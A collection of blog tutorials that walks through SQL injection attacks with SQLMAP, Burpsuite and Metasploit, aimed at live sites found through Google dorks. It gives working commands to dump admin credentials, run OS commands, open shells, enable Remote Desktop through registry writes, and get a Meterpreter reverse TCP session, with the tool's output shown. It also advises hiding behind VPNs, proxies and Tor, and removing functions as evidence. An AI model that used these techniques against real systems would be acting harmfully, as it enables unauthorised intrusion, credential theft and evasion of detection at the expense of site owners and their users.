| 2 | IhazYOURpassWORDtoo| JohnDoe |

+-----+------------------------------+------------+

We have got Admin credentials! I hope they work on cpanel...
OK...so we have pulled all that we can from this server using SQLinjection, or have we? NOT EVEN CLOSE...

Since we have changed platforms and are now running on Linux with Metasploit also installed it is time to start putting SQLMAP to some real ninja work. Let's see what we have to work with: COmmand: sqlmap.py --help

...excerpt:

Operating system access:

These options can be used to access the back-end database management

system underlying operating system.

--os-cmd=OSCMD Execute an operating system command

--os-shell Prompt for an interactive operating system shell

--os-pwn Prompt for an out-of-band shell, meterpreter or VNC

--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC

--os-bof Stored procedure buffer overflow exploitation

--priv-esc Database process' user privilege escalation

--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed

--tmp-path=TMPPATH Remote absolute path of temporary files directory

As you can see quit a few options, but all require Linux and working Metasploit as dependancy which is why I did not cover them on the last tutorial. We will begin with '--os-cmd' and work our way down from there explaining the different attack methods as we go...

We can try to run operating system commands using: '--os-cmd' and/or '--os-shell'
It is possible to execute commands on the database server's underlying operating system when the back-end DBMS is running either MySQL, PostgreSQL or MSSQL Server, AND the session user has the necessary privileges for the database. If you want to understand how SQLMAP accomplishes things please visit the homesite for the product or read the docs included with download as I dont have the time to go into that here, just know it works and is very capable and the methods used can change slightly based on whether or not you need to see/retrive the response back on screen or not...
These techniques are also well detailed in the white paper which is linked from the homesite's main page, called "Advanced SQL injection to operating system full control". The basic command structure looks like this:

EX: python sqlmap.py -u "http://site.com/pgsql/example.php?id=1" --os-cmd id -v 1

Results...

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL

[16:09:15] [INFO] fingerprinting the back-end DBMS operating system

[16:09:15] [INFO] the back-end DBMS operating system is Linux

[16:09:18] [INFO] testing if current user is DBA

[16:09:25] [INFO] detecting back-end DBMS version from its banner

[16:09:25] [INFO] checking if UDF 'sys_eval' already exist

[16:09:35] [INFO] checking if UDF 'sys_exec' already exist

[16:09:35] [INFO] creating UDF 'sys_eval' from the binary UDF file

[16:09:35] [INFO] creating UDF 'sys_exec' from the binary UDF file

do you want to retrieve the command standard output? [Y/n/a] y

command standard output: 'uid=104(mysql) gid=106(mysql) groups=106(mysql)'

[16:09:37] [INFO] cleaning up the database management system

do you want to remove UDF 'sys_eval'? [Y/n] y

do you want to remove UDF 'sys_exec'? [Y/n] y

[16:09:45] [INFO] database management system cleanup finished

[16:09:45] [WARNING] remember that UDF shared object files saved on the file system can

only be deleted manually

You should choose "YES" to most of the prompts unless you know what you are really doing. This is especially true for the cleanup phase to remove the user added functions which allow the takeover to take place (thus removing one more piece of evidence)...

If SQLMAP has not confirmed stacked queries can be used (i.e. PHP or ASP with back-end database management system running MySQL) and the DBMS is MySQL, it is still possible to perform successful attack using the "INTO_OUTFILE()" function to create a web backdoor in a writable folder within the web server document root allowing command execution (assuming the back-end DBMS and the web server are hosted on the same server - if not then all bets are off!). IF this scenario is detected SQLMAP will prompt the user for additional targets to try and upload the web file stager and backdoor to. The tool has pre-built features allowing you to choose from SQLMAP's file stagers and backdoors for the following languages: ASP, ASP.NET, JSP, and PHP (which is the default option). You will be prompted to make these selections to aid the tool in getting the job done when you run the initial takeover command using '--os-cmd' argument.

In addition to executing commands on the underlying OS you can also prompt for a direct SQL Shell to work from using the '--os-shell' argument. It simulates a real shell that will allow you to execute arbitrary commands as you wish, and as many as you need. The option is --os-shell and has the same TAB completion and history functionalities that --sql-shell has or owuld be exeprienced in most Shell evironments. Another alternative is simply adding your commands with the '--sql-query feature like so:

EX: sqlmap.py -u http://site.com/example.asp?id=666 --sql-query "SELECT @@datadir"
     NOTE: Sometimes SQLMAP will find an injection spot but fail to pull anything useful,
     so it is worth doublechecking your commands here to test the accuracy of results or
     to find certain bits of data that SQLMAP might not have included in the base set
     of commands (like the example above used to find local directory for SQL installation)

More Takeover Techniques? You bet ya...

If the Database Server is hosted on a Windows machine you can also use SQLMAP to read and write changes to the system registry. This is possible when the DBMS is running MySQL, PostgreSQL or Microsoft SQL Server AND supports stacked queries. The current session user will also need the proper privileges to access it.

Arguments that can be used:

'--reg-read' used to read registry key values.

'--reg-add' used to write regitry key values

'--reg-del' used to delete registry keys values

Auxiliary registry switches: '--reg-key', '--reg-value', '--reg-data' and '--reg-type'

Auxiliary switches can be used as additional arguments to define registry specifics for running the main arguments to skip interactrive prompts

'--reg-key=PATH' used to specify key path for Windows registry

'--reg-value=NAME' used to define value item name inside provided key

'--reg-data=VALUE' used to define value data

'--reg-type=TYPE' used to define the type of value

Here is an example of what it would look like if we wanted to check the remote Windows S2k3 target to see if Remote Desktop is enabled alredy:

EX: sqlmap.py -u http://site.com/example.aspx?id=1 --reg-read --reg-key="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" --reg-value=fDenyTSConnections

Results...

=1...

Damn...0=Enabled..&..1=Disabled

...Good thing we are persistant ;)

To enable the Remote Desktop feature on the target machine so we could then remote in using some of the credentials we dumped from the database earlier :)

EX: sqlmap.py -u http://site.com/example.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" --reg-value=fDenyTSConnections --reg-type=DWORD --reg-data=0

Now issue the '--reg-read' command again to confirm the value was updated and returns a value of 1.
      NOTE: On most systems this would require a system restart so this may not be all
      that helpful in real life settings, but this should give you an idea of what you can
      be capable of as the options are only limited by you knowledge o the system registy
      so get to studying...

...

......

More Takeover Techniques? Yeah, I got a few more for you...

....so that is what SQLMAP is capable of on its own, now let's see what we can do when we add Metasploit to the equation and test SQLMAP using Out-of-band stateful connections (i.e using Metasploit modules & Meterpreter), using the following arguments/switches to put it all together: '--os-pwn', '--os-smbrelay', '--os-bof', '--priv-esc', '--msf-path' and '--tmp-path'. Each of these options will perform different attacks to try and take over the database server. These switches arguments can be used to get an interactive command prompt, a Meterpreter session or a VNC session.

SQLMAP relies on Metasploit to create the shellcode and implements four different techniques to execute it on the database server.

These techniques are:

Database in-memory execution of the Metasploit's shellcode via sqlmap own user-defined function sys_bineval(). Supported on MySQL and PostgreSQL. Switch or argument to use attack method: '--os-pwn'
Upload and execution of a Metasploit's stand-alone payload stager via sqlmap's own user-defined function sys_exec() on MySQL and PostgreSQL or via xp_cmdshell() on Microsoft SQL. Switch or argument to use: '--os-pwn'
Execution of Metasploit's shellcode by performing a SMB reflection attack ( MS08-068) with a UNC path request from the database server to the your machine where the Metasploit smb_relay server exploit is setup and listening. Supported when running sqlmap with high privileges (uid=0) on Linux/Unix and the target DBMS runs as Administrator on Windows. Switch or argument to use attack method: '--os-smbrelay' _3a) This requires setup of SMBrelay attack from Metasploit's ./msfconsole
4) Database in-memory execution of the Metasploit's shellcode by exploiting Microsoft SQL Server 2000 and 2005 sp_replwritetovarbin stored procedure heap-based buffer overflow ( MS09-004). _4a) sqlmap has its own exploit to trigger the vulnerability with automatic DEP memory protection bypass, but it relies on Metasploit to generate the shellcode to get executed upon successful exploitation. Switch or argument to use attack method: '--os-bof'
Let's begin with option 1: '--os-pwn'

EX: python sqlmap.py -u "http://www.site.com/mysql/iis/example.aspx?id=1" --os-pwn --msf-path /pentest/exploits/framework3

Most important thing to note here is that we are defining the path to Metasploit using the '--msf-path' argument to tell sqlmap where to look so it can get Metasploit to prepare the shellcode to be used for the attack. (NOTE: I beleive this is one of the reasons it doesnt work on Windows as the path will not use Windows friendly path names/formatting and it seems to be hard coded for Linux use only). This will work similarly to the previous outline aboev for '--os-cmd' in that SQLMAP will do everything possible to make it work without user interaction but it may prompt you to identify the document root folder so it knows where to try and upload to make it work. You can also provide comma separated alternatives as additional otions/places to try.

Results from above '--os-pwn' command...

[...]

[hh:mm:31] [INFO] the back-end DBMS is MySQL

web server operating system: Windows 2003

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0

back-end DBMS: MySQL 5.0

[16:10:05] [INFO] fingerprinting the back-end DBMS operating system

[16:10:05] [INFO] the back-end DBMS operating system is Windows

how do you want to establish the tunnel?

[1] TCP: Metasploit Framework (default)

[2] ICMP: icmpsh - ICMP tunneling

[16:10:05] [INFO] testing if current user is DBA

[16:10:05] [INFO] fetching current user

what is the back-end database management system architecture?

[1] 32-bit (default)

[2] 64-bit

[16:10:05] [INFO] checking if UDF 'sys_bineval' already exist

[16:10:06] [INFO] checking if UDF 'sys_exec' already exist

[16:10:09] [INFO] detecting back-end DBMS version from its banner

[16:10:09] [INFO] retrieving MySQL base directory absolute path

[16:10:11] [INFO] creating UDF 'sys_bineval' from the binary UDF file

[16:10:12] [INFO] creating UDF 'sys_exec' from the binary UDF file

how do you want to execute the Metasploit shellcode on the back-end database underlying

operating system?

[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)

[2] Stand-alone payload stager (file system way)

[hh:mm:35] [INFO] creating Metasploit Framework 3 multi-stage shellcode

which connection type do you want to use?

[1] Reverse TCP: Connect back from the database host to this machine (default)

[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports

between the specified and 65535

[3] Bind TCP: Listen on the database host for a connection

which is the local address? [192.168.136.1]

which local port number do you want to use? [60641]

which payload do you want to use?

[1] Meterpreter (default)

[2] Shell

[3] VNC

[16:10:15] [INFO] creation in progress ... done

[16:10:15] [INFO] running Metasploit Framework 3 command line interface locally, please wait..

<METASPLOIT Banner>
=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12655 updated today (2011.05.17)

PAYLOAD => windows/meterpreter/reverse_tcp

EXITFUNC => thread

LPORT => 60641

LHOST => 192.168.136.1

[*] Started reverse handler on 192.168.136.1:60641

[*] Starting the payload handler...

[hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval',

please wait..

[*] Sending stage (749056 bytes) to 192.168.136.129

[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11

hh:mm:52 +0100 2011

meterpreter > Loading extension espia...success.

meterpreter > Loading extension incognito...success.

meterpreter > [-] The 'priv' extension has already been loaded.

meterpreter > Loading extension sniffer...success.

meterpreter > System Language : en_US

OS : Windows .NET Server (Build 3790, Service Pack 2).

Computer : W2K3R2

Architecture : x86

Meterpreter : x86/win32

meterpreter > Server username: NT AUTHORITY\SYSTEM

meterpreter > ipconfig

MS TCP Loopback interface

Hardware MAC: 00:00:00:00:00:00

IP Address : 127.0.0.1

Netmask : 255.0.0.0

Intel(R) PRO/1000 MT Network Connection

Hardware MAC: 00:0c:29:fc:79:39

IP Address : 192.168.136.129

Netmask : 255.255.255.0

meterpreter > exit

[*] Meterpreter session 1 closed. Reason: User exit

By default MySQL on Windows runs as SYSTEM, however PostgreSQL runs as a low-privileged user "postgres" on both Windows and Linux. Microsoft SQL Server 2000 by default runs as SYSTEM, whereas Microsoft SQL Server 2005 and 2008 run most of the times as NETWORK SERVICE and sometimes as LOCAL SERVICE.

It is also possible to provide sqlmap with the --priv-esc switch to perform a database process' user privilege escalation via Metasploit's getsystem command which include, among others, the kitrap0d technique ( MS10-015).

This brings us to the end of this adventure. I hope you have enjoyed these last few articles on some different methods to performing SQL injection with this great tool called SQLMAP. I can only think of one other topic for which I might cover this tool again and that would be how to use it to attack an ORACLE database like the new 10g or 11g but we will see (not sure if I have any time anytime soon). I am also leaning towards a quick mini article on SQLNINJA a similar tool whose goal is less focused on extracting data and more focused on getting full access to underlying OS and really has some neat features built into it and then on to bigger and better topics. I hope to bring you more tutorials and introductions to other great tools in the near future, until then please stay tuned and check back often for updates. Until next time - H.R.

This ain't your standard $GET request!

2011-05-09T17:15:00.000-05:00

Today I will show you how to use SQLMAP to perform SQL injections via $POST. I should point out that this is not all that common of a vulnerability in the wild these days, but it is very good to know and should be tested before you give up all hopes on your target site. I would rate this as Intermediate in nature, due to complex nature of orchestrating things to work, but it is not all that hard to do if you give it a few tries. Here we go, try to keep up...

Start off by making sure you have the following requirements:

Burpsuite (latest copy - free version is fine)
Download from Homepage: http://portswigger.net/burp/download.html
Just download and run burpsuite_v1.3.03.jar file (version number may change)
Requires JRE Environment to be installed to run, platform independant
SQLMAP (latest copy - Open Source=FREE)
Download from Homepage:
http://sourceforge.net/projects/sqlmap/files/sqlmap/
Requires Python to be installed, platform independant although not all features capable on Windows platform
*Site with $POST data being submitted for us to find and inject (i.e. Login page or search fields
Example Google Dork: "inurl:admin/login.php" get creative and get better results

Now ow it is time to find a site where we can start doing some testing, let us use Google to see what we can find using a simple dork:
EX: "ext:php inurl:admin/login site:US"
       NOTE: There are variations to this, so use your own creativity to increase your odds
Resulting Target Found: http://www.site.com/Admin/login.php (take note, write it down, and close browser)

Now it is time to use Burpsuite to help us find out the needed fields for injecting. Run the "burpsuite_v1.x.jar" file to get up and running, just double click it OR start it from the command line by using 'java -jar burpsuite_v1.x.jar' (replace "x" with your version number).
Bursuite is configured by default to operate on port 8080, so you will need to configure your favorite browser to use this as the proxy address so that Brupsuite can pick up all of the traffic for analysis and examining. For most browsers you can open and then go into options or internet options>>connections>>LAN Settings>>PROXY Settings>>and then set to: 127.0.0.1:8080>>save>>and your done.

Now any pages you go to in your web browser will be parsed by Burpsuite, simple remove proxy setting to go back to normal surfing. By default Burpsuite has the option to "Intercept Data" set to "ON". This is helpful if you want to tamper with data for EVERY request travling on the line. You can quicklya nd easily turn this off if you dont want as much interaction as it will still save the logs for requests sent and received to the HISTORY tab. I prefer to leave it ON as I see more of what is actually going on and can simply DROP any I dont want or FORWARD to allow without very much hastle. Leave it setup for now, we will come back to this in a few...

NOTE: you will have to do some back and forth to see the results while we test so I suggest you just minimize or adjust your screens so you can run side by side (my preference) to save your self time.

Now that we have a potential target and Burpsuite running we will start testing it with our browser to see what all is captured. Surf to the login page found with our Google Dorks earlier and watch as the Burpsuite starts to blink for user interaction. Assuming you have default behavior you will need to "FORWARD" or "DROP" the requests as they are sent and received. This equates to allow or drop in simple terms. You can review the actual details of what is being sent in the RAW tab window (you change tabs to view different aspects of what is ebing sent/received). Let us try entering "logintest" in the login field and "passtest" in the password field, then submit. Obviously this is not going to get us into the site, unless you are just a really lucky guesser, BUT it will help us to get one step closer to accomplishing that task. You will see the request come through Burpsuite again, FORWARD the request to allow it to run through the full authentication cycle. Now lets review the results from that simple request we just sent...

In Burpsuite navigate to the HISTORY tab, two to the right of the main INTECEPTOR tab we have been working from since we started. The HISTORY tab will outline all of the details that were captured when we sent the login request to our target site.

You should see one or two $GET requests which were sent from you when you were actually navigating to the target site, and then you should find a $POST request from when we actually submitted the login page/form. This is the one we are actually interested in. Highlight the $POST request in the history tab and you can view the specifics down below in the RAW tab window. This is a view of the $POST request sent, if you look through it (likely near bottom) you will notice the actual post parameters sent for the form fields we entered (testlogin & passtest).

It should look something like this:
POST /Admin/login.php HTTP/1.1
Host: http://www.site.com/
Proxy-Connection: keep-alive
Referer: http://www.site.com/Admin/login.php
Cache-Control: max-age=0
Origin: http://www.ostergottesdienste.de/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=a3b362a522444335b693ab04007ebbed
Content-Length: 133
_auth_username=testlogin&_auth_password=testpass&Submit_button=Submit

*Notice* the "_auth_username=testlogin" & "_auth_password=testpass". These are the $POST fields we just sent, these field names may vary from site to site so please stay with me if yours a little different.
        Note the cookie field to see if this is of any value, as this and user-agent fields
        are also injectable (to be covered in another article).
           *PRO TIP*: If you use tools like Cain and Able you can use this method to
              add to the "HTTP_PASS_FIELDS.LST" & "HTTP_USER_FIELDS.LST" files
              to increase your chances of  catching credentials while pulling off MiTM attacks
              as you can add the form fields it looks for.

OK now that we know our $POST variables we will be working with, it is time to startup SQLMAP. Open command prompt and type in 'sqlmap.py', see previous posts regarding how to set environment variables to avoid having to navigate to the install folder. Now that SQLMAP is up we will start feeding it the data we found from our previous steps above (_auth_username=&_auth_password=&Submit_button=). We will need to let identify we want to use $POST method to inject our website by issuing the '--data' argument followed by our $POST fields we found using Burpsuite "_auth_username=" & "_auth_password=".

NOTE: $GET requests are sent by SQLMAP as default but by issuing the '--data' argument it is smart enough to know to change to $POST - realized by you supplying the those $POST parameters with the '--data' argument in command. The fields passed are then used to test for SQL injection as well as any
provided GET parameters that might normally be tested for.

EX: sqlmap.py -u http://www.site.com/Admin/login.php --data "_auth_username=test&_auth_password=test$Submit_button=Submit"

*PRO TIP* If you know or only want to test certain fields then only include the ones you want (i.e. _auth_password only). If you started a scan and it doesnt look like it is an injectable field you can hit 'CTRL+C' to pause and then you can hit 'N+ENTER' to skip to the next field to start testing. This can save you from spending unnecessary time.

Once confirmed that you have found an injection point, we can add arguments we learned from our previous introductions to find crucial information. We transform the above command into the following:
EX: sqlmap.py -u http://www.site.com/Admin/login.php --data "_auth_password=test" --current-user --current-dba --users --dbs --is-dba

Once we have processed results we will check for passwords, using the '--passwords' and see if we can get any...
EX: sqlmap.py -u http://www.site.com/Admin/login.php --data "_auth_password=test" --passwords
NOTE: this is assuming you have gone in order, as it will read the session file already created to skip things like (--users) which normally accompanies this command argument...

You can continue enumerating the database for more details on tables, columns, etc but that was already covered in my two original posts on SQLMAP so I will not go into any more details on how to dump the database. If you are super lazy and this was too complex for you, then you can use the easy way out as covered in my mini-tutorial at the end of SQLMAP Tips & Tricks article (--forms).

I hope you have enjoyed this little twist to your standard injection techniques, and hope you walk away remembering to leave no rock unturned in your search for vulnerabilities and injection points. I will try to include more in depth coverage on Burpsuite and its other functionalities and how else it can be used in future articles, but I encourage you in the meantime to please dig around in it and try to get creative.

Later,
H.R.

SQLMAP Volume 2: TIPS & TRICKS

2011-05-05T00:44:00.001-05:00

1) You need to be safe, so this is crucial. I assume you already have a trusted VPN connected and now to be extra ninja we are also going to route traffic through proxies. We can accomplish this by simply setting the '--proxy=PROXY' parameter which will enable use of proxies during scanning.
         EX: sqlmap.py -u http://site.com/example.php?id=1 --proxy=http://proxysite.com:PORT
         You can also supply credentials with the '--proxy-cred=user:pass' argument

2) You can speed scans by increasing the THREAD count, since the default is set to 3 request at a time.
         2a) If you set this beyond the default you may want to also set the '--delay=DELAY'
         parameter to allow some strategic delays between requests (or to speed up
        even further, although I have a feeling this leads to errors which other tools are prone to
        (cough..Havij)
         2b) You can use the '-o' switch to enable all of the optimiZation features at once
        2c) If you are performing time based attacks or blind injections then it may be a better
         idea to leave thread count alone and use the '--predict-output' argumernt
         which will save you a bit of time and will allow SQLMAP to perform some analysis
         on found results in session file to help speed things up (can slow things down in other
         scenarios where the '-o' option is much better choice.

3) You can have the tool load different USER-AGENTS in case a site or page has restrictions based on browser type. This can be accomplished by adding the '-a <insert/path/to/file>' parameter to your command string. It needs to be followed by the path to the file containing the USER-AGENTs to be used. You can run a few searches on Google to find some common ones or how to come up with your own custom USER-AGENT. NOTE: this may have been replaced by --user-agent=<insert user agent details> with latest update
         3a) there is a default list provided with installation that you can add to or see how they
        are modeled located at: '~\sqlmap\txt\user-agent.txt'
        *3b) you can also just let SQLMAP do the deciding by issuing the '--random-agent'

4) If you need to fake out the referer in the request due to restrictions on server side you can change the default values by using the '--referer=<http://www.insert/REFERER/page/.com/%3E'

5) Need credentials to perform a more in depth scan? No problem! We can set the credentials using the '--auth-cred' followed by credentials in the typical 'user'':''pass' format
          EX: --auth-cred=user:password or --auth-cred=admin:IhazYourPazword!

6) You can load targets using GOOGLE and DORKS, by using the '-g' argument followed by the search dork in quotes ""
          EX: sqlmap.py -g "inurl:index.php?id= site:us"
          NOTE: It will work on any targets found in an interactive manner but only the
          arguments passes with original command will be used on each target so make sure you
          use some basics but not too much.

          EX: sqlmap.py -g "inurl:index.php?id=" -b --current-user --current-db --is-dba --dbs
         6a) You can also process more than one site request at a time from a file by changing
          the standard '-u' to '-r <path/to/load/HTTP/requests/from/>'

7) You can save and resume scans and data retrieved in session file (in "output" folder) to save time, or to pick things back up where you last left off. You need to use the '-s <insert/path/to/session/file>/session' parameter to tell it where to look to parse results from.
          NOTE: Point it directly at the session file and not just the folder it is in or it
          wont load properly.
You can also use the recorded scan details to learn a LOT. It contains info on the queries used to get all the details as well as everything found, so it is a good reference and learning tool (all dumps are converted to .CSV files which are above and beyond the log and session files that are saved).

8) You can use the '--eta' paramter to have the scans keep an ETA so you have an idea of how long things are going to take. This come in handy when doing dumps of database to give you an idea of how long it thinks it will take (very useful when blind or trying to make determination as to whether or not it makes sense to dump a questionable table in full or just what you need. Remember if it looks like it will take too long you can use the '-s' argument to pick it back up later See step 7 above)

9) You can use '--flush-session' to clear out the results stored for a session file if you need to just start over, or in case the admin has come along and made some changes since your last visit ;)

10) The last one I will leave you with is very important if you are working on Linux machine, like Backtrack, to make sure you have the latest version of SQLMAP as it is constantly being worked on and new developments constantly being released. This can be accomplished by a quick addition of the '--update' argument.
           EX: sqlmap.py --update
           NOTE: if you are working on Windows then you can either check the SQLMAP
           homepage often for updated version to download or you can try the Windows SVN
           client called TortoiseSVN GUI, and can be found here and is available for both 32
           and 64 bit computers: http://tortoisesvn.net/
                     You just download and install, then navigate to the SQLMAP install folder in
                     Windows Explorer and you will now have green icon next to those folders
                     that can be updated by SVN. Just right click and choose the option to
                     SVN UPdate folder contents. Once it is done you have updated copy.

BONUS Material:
1) When attacking version 4 databases with no information schema to rely on there are still several options with SQLMAP:
          1a) You can use the '--common-tables' and '--common-columns' arguments to try and bruteforce the table and column names. The default list is much greater than Havij and other tools and can easily be added to if you want to beef it up, it as well as many others used can be found at: ~\sqlmap\txt\*.txt

2) If you dont get any positive results from injection but you have a gut fealing that the site is vulnerable then you can try increasing the '--level' or '--risk' arguments beyond the default level of 1. When you do this it will allow SQLMAP to perform more intense attacks and check for additional injection points such as the cookie field, user-agent field, and even the referer field. I typically will add '--level 3 --risk 3' to my command string if I dont get what I am looking for and have a strong feeling there is an injection point that is some how being overlooked.
3-X)=Updates recently introduced:
' --batch' allows you to walk away from the terminal and let SQLMAP make all of the decisions on your behalf fro all instances where it would usually prompt for interaction, a true hands free experience
' --schema' which can be used to enumeate the databases or schema
' --parse-errors' which tells SQLMAP to parse the error messages from response pages received from queries - helpful when using google dorks
' --mobile' which like the user-agent argument allows SQLMAP to act as if it was a mobile device, which can be handy in testing many of the new mobile.site.com spin-off domains to help reach ever expanding consumer markets with very little concern for security or sanitization :)
Last, but certainly not least as this can be very helpful in adding to YOUR security:
' --tor' which enables SQLMAP to perform queries through the default TOR proxy setup address

Mini-Tutorial on the: --forms
So you want to inject a search form or try to bypass basic login page (with the typically two input fields such as user and pass), you can either pass to sqlmap the request in a request file (-r) as noted aboved, or you can set the $POST data accordingly using the '--data' argument,...
...or let SQLMAP do it for you!
Both user and pass from above example, as do others in real life, appear as <form> and <input> tags in HTML code. This is where this switch will get to perform its handy work. Provide SQLMAP with '--forms' as well as the page where the form can be found as the target url '-u' and SQLMAP will do the rest, by parsing the forms it has found on page provided and will interactively guide you through to test for SQL injection on the form input fields (rather than performing a normal injection scan on site provided by '-u').

Hope these help you with the tool SQLMAP a little bit more. Still working on adding some more instructions and tutorials regarding the additional features that interact with the filesystem, system registry, and actual command execution with a little help from Metasploit. I am also planning a separate short article on how to perform injections via $POST :)

Until next time...
Later - H.R.

SQLMAP Basic Introduction and Tutorial

2011-04-28T09:10:00.000-05:00

There are times when manual efforts just wont work or you plain dont have the skills and other famous tools like Havij dont seem to do the trick either. I experienced one of these times recently and it lead me to another great tool that just doesn't seem to be as popular - SQLMAP. I had a site the other day I was working on my injections with and could not get it manually due to poor skills at timing things, reading results, and PATIENCE. Havij was cracking out due to timing method sucking and I dont have skills to do it manually (props to those that can), so here is a tutorial I put together on how to go about cracking this thing wide open using the less commonly known tool SQLMAP. Let me first start by saying if you are afraid of the command line then just leave now because there is no GUI for this and I dont think there ever will be. If you really want to hack you need to get familiar with it so why not start now. Let's begin...

There is no need to waste time with $hitcash and other download sites. For a stable and virus free copy just get from the official site here: http://sqlmap.sourceforge.net/
             Direct to Download Page: http://sourceforge.net/projects/sqlmap/files/sqlmap/

You will simply extract this to the desired folder you want to run and use it from. As mentioned this is a command line tool, NO GUI. If you want to add it to your path variable so you can run it from anywhere the command prompt opens by following these simple steps:

1) Right click on Computer and choose Properties option
2) In the System window click on Advanced system settings in the left pane
3) In the System Properties window select Advanced tab and click on Environment Variables
4) In the Environment Variables window you will notice two columns User variables for a username and System variables - we need the user variable to the PATH so it knows where to open the program wherever we decide to open CMD from
5) Now to add a PATH to the User variable, highlight PATH and click on New… button. In the New User Variable dialog box type the Variable name and Variable value and click OK button. If you are unsure you can choose to edit the PATH variable to see how it is done (IF YOU CHANGE THIS YOU MAY HAVE PROBLEMS, SO BE CAREFULL, now just add path to sqlmap.exe to the end and your done, hit OK and save.
     5a) To remove a User variable click on the required User variable and then click on Delete button
     5b) To edit a User variable click on Edit… button. In the Edit User Variable dialog box
     edit the Variable name and Variable value and click OK button

NOTE: you can skip the path variable part if you want but then you must be in the folder to run it from command line (I am lazy and dont like to navigate so I like to set it and forget it)

OK now you should be ready to get started...open the command prompt and type sqlmap or sqlmap.exe to see if you set the path variable correctly. If you get "error: missing a mandatory parameter..." then you are in business. To begin I suggest opening two command prompts at the same time and put them side by side (it will help make this easier to visualize and learn while we go through this tutorial). On one side you need to simply type in 'sqlmap --help' and see what follows, you will quickly see sqlmap has a LOT of options available for you to choose from. I will cover some of the basics to help get you started. Keep the help menu open on one side and now we will begin working from the other side.

I will assume you have done your own searching on the web to find some vulnerable targets, so let's get started testing them. we will use the '-u' option to define our target site, like this:

EX: sqlmap -u http://site.com/example.php?id=1

Results...PHP 5.2.14, Apache 2.2.17, MySQL 5
this will perform a basic run at the target to test for injection, simply providing basic overview info. We can use the '-f' parameter to get some more specific information from our target, like this:

EX: sqlmap -u http://site.com/example.php?id=1 -f

Results are not too much more than previous (you get column count or vulnerable column if you pay close attention to info retrieved as well as specifics on version). The results will also be stored for the entire session in the 'output' folder wherever sqlmap is physically installed - it also shows the commands used to get the info. That doesnt really tell us a lot so lets grab the site banner to see what it can tell us as well as some other useful info from the Database itself by changing up the command and adding a few more paramaters, like so:

EX: sqlmap -u http://site.com/example.php?id=1 -f -b --current-user --current-db --is-dba --users --dbs
Results:

NOTE: it seems to process them in the order you pass the arguments, so if it fails along the way you dont get the rest. For this reason I usually start with the above command and then start to change from there to get more info...

-f = Back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
              comment injection fingerprint: MySQL 5.1.00
              banner parsing fingerprint: MySQL 5.0.92
-b = banner:    '5.0.92-community'
--current-user = read from file 'C:\sqlmap-0.8_exe\output\site.com\session': user@localhost
--current-db = same as above, reads from session file created for scan but shows current database
--is-dba = same as above, reads from session file created for scan but shows if current user is DBA: 'TRUE' or 'False'
--users = same as above, reads from session file created for scan but shows number of database users and usernames
--dbs = same as above, reads from session file created for scan but shows ALL of the databases available, not just current
current user:    'user@localhost'
current database: database1
system users [1]: 'user'@'localhost'
current user is DBA:    'False'
vailable databases [5]:
[*] information_schema
[*] database1
[*] database2
[*] database3
[*] database4

This pretty much gets you set up with the basic info, you can go a step further and add the '--passwords' to the end of the command to try and extract the users passwords fro database users if they are available. This is not always effective though (i.e. no MySQL table) which is why it is best to add after the basics or at the end of your recon session, like so:

EX: sqlmap -u http://site.com/example.php?id=1 -f -b --current-user --current-db --is-dba --users --dbs --passwords

OR by itself following our recon command like this:

EX: sqlmap -u http://site.com/example.php?id=1 --passwords

You can also check user priveleges '--priveleges' to check user priveleges as well as roles '--role'..., but what if you want to dig deeper into the Database(s) to find more info, no problem....let's keep going and extract all of the table names and columns...

Now we need to keep it simple and just request what we need using these new parameters: '--tables', '--columns', and '-D', like this:

EX: sqlmap -u http://site.com/example.php?id=1 --tables -D database1

Results....it will load all of the results into the log file stored in the "output" folder wherever you installed sqlmap physically on your system, while it also prints the results to the screen.

The results would look something like this:
[16:10:05] [INFO] fetching tables for database 'database1'
[16:10:05] [INFO] fetching number of tables for database 'database1'
[16:10:05] [INFO] retrieved: 13
[16:10:16] [INFO] retrieved: access
[16:10:53] [INFO] retrieved: action
[16:11:40] [INFO] retrieved: ad
[16:11:55] [INFO] retrieved: adcriteria
[16:13:02] [INFO] retrieved: adminhelp
[16:13:56] [INFO] retrieved: administrator
[16:15:14] [INFO] retrieved: adminlog
[16:16:00] [INFO] retrieved: adminmessage
[16:17:26] [INFO] retrieved: bbcode
[16:18:26] [INFO] retrieved: config
[16:19:26] [INFO] retrieved: db_users
[16:20:26] [INFO] retrieved: users
[16:21:26] [INFO] retrieved: etc
Database: database1
[13 tables]
+-----------------+
| access              |
| action              |
| ad                    |
| adcriteria         |
| adminhelp        |
| administrator   |
| adminlog          |
| adminmessage |
| bbcode            |
| config              |
| db_users          |
| users                |
| etc                  |
+-----------------+
....and so on until it is done finding all of the tables for the database you specified with the '-D database1' paramater earlier...and now we find the columns for the tables found above...

EX: sqlmap -u http://site.com/example.php?id=1 --columns -D database1 -T administrator

Results....remember you can check your logs in "output" folder...The results would look something like this:
[16:30:05] [INFO] fetching columns for table 'administrator' on database 'database1'
[16:33:05] [INFO] fetching number of columns for table 'administrator' on database 'database1'
[16:36:05] [INFO] retrieved: 3
[16:39:16] [INFO] retrieved: user
[16:45:53] [INFO] retrieved: pass
[16:46:40] [INFO] retrieved: id
[16:49:26] [INFO] retrieved: etc
Database: database1
